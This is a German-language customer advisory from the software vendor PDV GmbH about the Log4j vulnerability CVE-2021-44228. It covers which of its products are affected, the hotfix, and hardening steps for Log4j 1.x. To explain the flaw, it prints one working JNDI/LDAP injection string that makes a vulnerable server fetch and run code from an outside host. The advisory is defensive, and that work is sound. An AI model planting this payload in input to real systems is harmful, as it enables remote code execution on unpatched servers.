E-Akte-Awards seit 2016
Über 30 Jahre ECM Branchenkompetenz
120.000 produktive Nutzer/-innen täglich
360 Institutionen in Deutschland
PDV GmbH

Wichtiger Hinweis zur Sicherheitswarnung vom BSI zu der weit verbreiteten Java-Komponente Log4j 2

Sehr geehrte Damen und Herren,

in der sehr weit verbreiteten Java-Komponente Log4j 2 wurde eine kritische Schwachstelle entdeckt, welches es Angreifern ermöglicht, entfernt Code auszuführen (CVE-2021-44228). Das BSI stuft das Problem als kritische Bedrohungslage ein:

https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2021/2021-549032-10F2.pdf?__blob=publicationFile&v=3

Nach Prüfung unserer im Support befindlichen Produkte enthält der VIS-ESB die angreifbare Komponente und kann je nach Konfiguration und Verwendung von der Schwachstelle betroffen sein.  Der entsprechende Hotfix VB-246 steht bereits auf der PDV-Cloud bereit: Link

 

Achtung! Der Hotfix wurde am 16.12.2021 nochmals mit der neusten Version (2.16) des Log4J 2-Frameworks aktualisiert.  

 

Einige andere VIS-Komponenten verwenden Log4J 1.x in einer unproblematischen Konfiguration und sind daher nicht anfällig für diese Art des Angriffs.

Weitere PDV Produkte sind bisher daher nicht von der Schwachstelle betroffen. Die Analyze der Schwachstelle und deren Auswirkungen sowie weitere mögliche Angriffsvektoren werden aktuell von zahlreichen Sicherheitsexperten untersucht und ausgewertet. Wir werden im Verlauf reagieren und über weitere Entwicklungen an diese Stelle informieren.

 

Details / Beschreibung der Sicherheitslücke

Das Log4J Framework wird in Java-basierten Anwendungen eingesetzt, um Anwendungsmeldungen formatiert auf verschiedenen Kanälen auszugeben. Es hat sich über viele Jahre zum De-facto-Standard im Umfeld von Java-Anwendungen entwickelt und ist sehr weit verbreitet.

Die entdeckte Lücke nutzt einen Umstand, dass ein Meldungstext Platzhalter enthalten kann, welche Log4J bei der Verarbeitung auswertet und ersetzt. In Log4J 2.x ermöglicht diese Ersetzung, dass dynamische Aufrufen von Code über die Rechnergrenze hinweg. Enthält ein zu protokollierender Meldungstext z.B. das folgende Muster, dann führt das dazu, dass das Framework von einem entfernten Server (LDAP) versucht Schadcode nachzuladen und auszuführen:

"${jndi:ldap://codeserver.net/rce}"

Das Problem verschärft sich durch den Umstand, dass seit 12.12.2021 bekannt wurde, dass auch ohne das Nachladen von Schadcode von einem präparierten Server diese Lücke ausgenutzt werden kann. Erste Abwehrmaßnahmen, welche den netzwerkseitigen Zugriff von Systemen einschränken sind somit nicht ausreichend.

 

Das Log4J-Framework ist in zwei Ausprägungen, der Version 1.x und 2.x im Einsatz. Die hier beschriebene Sicherheitslücke bezieht sich in dieser Form ausschließlich auf die Version 2.x. Diese ist eine vollständige Neuentwicklung mit einer komplett neuen Architektur. Ein „einfacher“ Austausch der 1.x Komponenten durch 2.x ist nicht möglich.

 

Für die Version 1.x existiert vom BSI ebenfalls eine Warnung, da ein vergleichbarer Angriff beim Einsatz des dort enthaltenen JMS Appenders durchgeführt werden kann. Hierzu ist allerdings notwendig, dass dieser Appender in der Konfiguration explizit aufgenommen wird, was bei unseren Produkten im Standard nicht der Fall ist.  Zudem kommen noch weitere Bedingung z.B. dass sich die JMS API im Classpath befinde muss.

Für den Betrieb der VIS-Produkte ist der JMS Appender nicht konfiguriert und auch nicht notwendig und sollte daher in keinem Fall verwendet werden!

Die Logging-Konfiguration darf z.B. folgende Zeile nicht enthalten:

log4j.appender.jms=org.apache.log4j.net.JMSAppender

Um einen möglichen Angriff durch Fehlkonfiguration zu verhindern, können bei Bedarf folgende Klassen aus der Log4j-Jar-Datei entfernt werden:

org/apache/log4j/net/JMSAppender.class

org/apache/log4j/net/JMSSink.class

Wir haben einen Fork der Apache Log4j 1.2.17 angelegt und bereinigen dort die Schwachstellen, sodass auch bei einer ungewollten Konfiguration und ohne manuelle Änderung der Jar-Dateien kein unsicherer Betrieb auftreten kann. Diese angepasste Version werden wir in kürze hier bereitstellen.

 

Sollten Sie Fragen haben, steht ihr PDV Ansprechpartner und der Support gern zur Verfügung.

Vielen Dank Ihr PDV-Team